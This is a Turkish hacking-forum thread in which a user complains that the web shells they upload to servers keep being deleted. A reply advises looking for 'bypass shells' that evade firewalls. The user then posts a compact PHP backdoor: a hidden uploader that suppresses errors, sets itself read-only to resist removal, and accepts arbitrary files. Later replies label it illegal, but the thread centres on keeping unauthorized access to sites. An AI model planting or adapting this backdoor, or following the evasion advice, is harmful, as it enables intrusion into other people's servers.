Çözüldü Shellerim siliniyor
- Konuyu başlatan helpmii
- Başlangıç tarihi
Çözüm
Merhaba hocam,
Günümüz sunucuların çoğunda Firewalllar yüklediğin shell'in virüs dosyası olmasından kaynaklı olarak algıladığı anda silecektir. Bu yüzden alternatif Bypass Shelleri araştırmanı öneririm.
Günümüz sunucuların çoğunda Firewalllar yüklediğin shell'in virüs dosyası olmasından kaynaklı olarak algıladığı anda silecektir. Bu yüzden alternatif Bypass Shelleri araştırmanı öneririm.
- Konuyu başlatan
- #3
teşekkürler deneyeceğim
oldu çok teşekkür ederim
dostum bide bu kod ne işe yarıyor biliyormusun
<?php error_reporting(0);chmod(basename($_SERVER["PHP_SELF"]), 0444);echo("#0x2525");if(isset($_GET["u"])){echo'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo'<input type="file" name="file" size="30"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if($_POST['_upl']=="Upload"){if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){echo'S';}else{echo'F';}};};
Php ile yazılmış bir dosya upload kodu hocam.
Bu durumda, muhtemelen WordPress site sahibi tarafından alınan bir güvenlik önlemi var. Çok sayıda web sitesi, kötü amaçlı yazılım saldırılarını önlemek için güvenlik önlemleri kullanmaktadır ve bu önlemler, saldırganların sitelere erişimini engelleyebilir veya saldırganların erişim sağladığı dosyaları otomatik olarak siler. Bu nedenle, bir WordPress siteye shell atmak istiyorsanız, öncelikle site sahibinin alınan güvenlik önlemlerini aşmanız gerekebilir. Ancak, bu yasadışı bir eylemdir ve hem etik hem de yasal nedenlerle tavsiye edilmez. WordPress veya herhangi bir web sitesindeki açıkları tespit etmek ve raporlamak için site sahibi veya güvenlik uzmanlarına bildirimde bulunmanız daha doğru bir yaklaşım olacaktır.
Bu PHP kodu, bir dosya yükleme formu oluşturur ve sunucuya dosya yüklenmesine izin verir. Ancak, kodda bir hata ayıklama komutu da bulunur ("error_reporting(0);"), bu da kodda oluşan hataların görüntülenmesini engeller ve kötü niyetli amaçlarla kullanılabilir. Ayrıca, kodda dosya yükleme işlemi sırasında herhangi bir güvenlik denetimi yapılmaz, bu nedenle kullanıcılar tarafından yüklenen dosyalar zararlı olabilir. Bu kod, kötü niyetli kullanım amaçlarına sahip olan bir kişi tarafından kullanılabilir ve yasa dışı faaliyetlere yol açabilir. Bu nedenle, bu tür kodların kullanımı kesinlikle tavsiye edilmez ve etik değildir.
